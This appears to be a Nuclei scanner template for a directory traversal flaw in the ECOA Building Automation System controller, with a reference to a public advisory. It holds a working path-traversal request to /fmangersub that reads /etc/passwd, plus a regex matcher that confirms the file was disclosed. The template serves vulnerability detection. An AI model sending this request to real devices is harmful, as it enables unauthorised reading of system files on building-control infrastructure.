22 lines
688 B
YAML
22 lines
688 B
YAML
id: ecoa-building-lfi
|
|
|
|
info:
|
|
name: ECOA Building Automation System - Directory Traversal Content Disclosure
|
|
author: gy741
|
|
severity: high
|
|
description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
|
|
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
|
|
tags: ecoa,lfi
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body
|